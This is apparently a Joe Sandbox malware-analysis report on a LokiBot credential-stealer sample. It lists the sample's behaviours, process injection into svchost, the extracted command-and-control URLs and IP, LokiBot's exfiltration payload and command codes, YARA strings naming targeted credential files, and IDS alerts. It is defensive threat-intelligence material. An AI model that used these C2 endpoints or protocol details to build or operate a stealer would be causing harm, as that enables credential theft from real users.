Edit tour

Windows Analysis Report
ZsRFRjkt9q.exe

Overview

General Information

Sample name:	ZsRFRjkt9q.exe renamed because original name is a hash value
Original sample name:	7f04a1d1824b3ec895b377a60c065145.exe
Analysis ID:	1583581
MD5:	7f04a1d1824b3ec895b377a60c065145
SHA1:	f89bf4fea5f1be66fd69d14dadc88e7f4ea24606
SHA256:	d360ff97054b8da398a04cc947ba71f00e6f04ad83163abc9c13a5eaf9d7bd83
Tags:	exeLokiuser-abuse_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Lokibot

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected aPLib compressed binary

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

ZsRFRjkt9q.exe (PID: 6336 cmdline: "C:\Users\user\Desktop\ZsRFRjkt9q.exe" MD5: 7F04A1D1824B3EC895B377A60C065145)

svchost.exe (PID: 6512 cmdline: "C:\Users\user\Desktop\ZsRFRjkt9q.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1706217472.0000000004C00000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000001.00000002.1706020883.0000000002A12000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Process Memory Space: ZsRFRjkt9q.exe PID: 6336	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: ZsRFRjkt9q.exe PID: 6336	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: ZsRFRjkt9q.exe PID: 6336	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x23e7b3:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: svchost.exe PID: 6512	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 6512	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: svchost.exe PID: 6512	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 6512	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x5c72:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.ZsRFRjkt9q.exe.930000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.ZsRFRjkt9q.exe.930000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.ZsRFRjkt9q.exe.930000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.ZsRFRjkt9q.exe.930000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.ZsRFRjkt9q.exe.930000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.svchost.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
1.2.svchost.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.svchost.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
1.2.svchost.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.svchost.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.svchost.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.svchost.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.svchost.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.svchost.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.2.svchost.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.svchost.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 24 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\ZsRFRjkt9q.exe", CommandLine: "C:\Users\user\Desktop\ZsRFRjkt9q.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ZsRFRjkt9q.exe", ParentImage: C:\Users\user\Desktop\ZsRFRjkt9q.exe, ParentProcessId: 6336, ParentProcessName: ZsRFRjkt9q.exe, ProcessCommandLine: "C:\Users\user\Desktop\ZsRFRjkt9q.exe", ProcessId: 6512, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\ZsRFRjkt9q.exe", CommandLine: "C:\Users\user\Desktop\ZsRFRjkt9q.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ZsRFRjkt9q.exe", ParentImage: C:\Users\user\Desktop\ZsRFRjkt9q.exe, ParentProcessId: 6336, ParentProcessName: ZsRFRjkt9q.exe, ProcessCommandLine: "C:\Users\user\Desktop\ZsRFRjkt9q.exe", ProcessId: 6512, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T05:36:59.072613+0100	2024312	1	A Network Trojan was detected	192.168.2.4	56480	94.156.177.41	80	TCP
2025-01-03T05:36:59.935744+0100	2024312	1	A Network Trojan was detected	192.168.2.4	56481	94.156.177.41	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T05:36:58.373173+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	56480	94.156.177.41	80	TCP
2025-01-03T05:36:59.227615+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	56481	94.156.177.41	80	TCP
2025-01-03T05:37:00.003476+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	56482	94.156.177.41	80	TCP
2025-01-03T05:37:00.888134+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	56483	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T05:37:00.713558+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	56482	94.156.177.41	80	TCP
2025-01-03T05:37:01.736515+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	56483	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T05:37:00.713558+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	56482	94.156.177.41	80	TCP
2025-01-03T05:37:01.736515+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	56483	94.156.177.41	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T05:36:58.373173+0100	2021641	1	A Network Trojan was detected	192.168.2.4	56480	94.156.177.41	80	TCP
2025-01-03T05:36:59.227615+0100	2021641	1	A Network Trojan was detected	192.168.2.4	56481	94.156.177.41	80	TCP
2025-01-03T05:37:00.003476+0100	2021641	1	A Network Trojan was detected	192.168.2.4	56482	94.156.177.41	80	TCP
2025-01-03T05:37:00.888134+0100	2021641	1	A Network Trojan was detected	192.168.2.4	56483	94.156.177.41	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T05:36:58.373173+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	56480	94.156.177.41	80	TCP
2025-01-03T05:36:59.227615+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	56481	94.156.177.41	80	TCP
2025-01-03T05:37:00.003476+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	56482	94.156.177.41	80	TCP
2025-01-03T05:37:00.888134+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	56483	94.156.177.41	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://94.156.177.41/alpha/five/fre.php

Avira URL Cloud: Label: phishing

Found malware configuration

Source: 1.2.svchost.exe.400000.0.unpack

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for submitted file

Source: ZsRFRjkt9q.exe

ReversingLabs: Detection: 82%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: ZsRFRjkt9q.exe

Joe Sandbox ML: detected

Source: ZsRFRjkt9q.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: N4Y.PDBPE source: ZsRFRjkt9q.exe, 00000000.00000003.1648267905.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp, ZsRFRjkt9q.exe, 00000000.00000003.1648143042.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, ZsRFRjkt9q.exe, 00000000.00000003.1648143042.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, epistemology.0.dr
Source:	Binary string: wntdll.pdbUGP source: ZsRFRjkt9q.exe, 00000000.00000003.1653676890.0000000003360000.00000004.00001000.00020000.00000000.sdmp, ZsRFRjkt9q.exe, 00000000.00000003.1654427687.0000000003500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ZsRFRjkt9q.exe, 00000000.00000003.1653676890.0000000003360000.00000004.00001000.00020000.00000000.sdmp, ZsRFRjkt9q.exe, 00000000.00000003.1654427687.0000000003500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000001.00000002.1705861891.0000000000741000.00000020.00000001.01000000.00000004.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000001.00000002.1705861891.0000000000741000.00000020.00000001.01000000.00000004.sdmp

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00446CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00446CA9
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_004460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_004460DD
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_004463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_004463F9
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0044EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0044EB60
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0044F56F FindFirstFileW,FindClose,	0_2_0044F56F
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0044F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0044F5FA
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00451B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00451B2F
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00451C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00451C8A
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00451F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00451F94
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	1_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:56482 -> 94.156.177.41:80
